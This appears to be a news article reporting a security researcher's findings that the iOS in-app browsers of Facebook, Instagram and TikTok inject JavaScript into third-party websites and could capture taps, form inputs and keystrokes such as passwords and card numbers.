The iPhone apps of Facebook, Instagram and TikTok can easily track your in-app browser activities, claims a security researcher. Felix Krause, a security researcher and an ex-Google engineer has found out that despite these three famous social media apps claiming that they don’t track your data, they can easily track everything that you type in their in-app browser, if they want to.

“The iOS Instagram and Facebook app render all third party links and ads within their app using a custom in-app browser. This causes various risks for the user, with the host app being able to track every single interaction with external websites, from all form inputs like passwords and addresses, to every single tap,” Krause writes in a blog post.

The researcher says that Meta (formerly known as Facebook) and Instagram take advantage of the existing loophole that directs them to the in-app browser controlled by Meta rather than the web browser of user’s choice such as Safari or Mozilla Firefox. This gives the host app the power to track every single text typed in the browser like your passwords, addresses, purchase items and more.

The researcher further explains that Instagram and Facebook inject their  JavaScript code into every website shown, including when clicking on ads. While Facebook and Instagram currently don’t do this, they can track your in-app browser activity. “Even though the injected script doesn’t currently do this, running custom scripts on third party websites allows them to monitor all user interactions, like every button & link tapped, text selections, screenshots, as well as any form inputs, like passwords, addresses and credit card numbers.”

“TikTok iOS subscribes to every keystroke (text inputs) happening on third party websites rendered inside the TikTok app. This can include passwords, credit card information and other sensitive user data. We can’t know what TikTok uses the subscription for, but from a technical perspective, this is the equivalent of installing a keylogger on third party websites,” reads his blog post.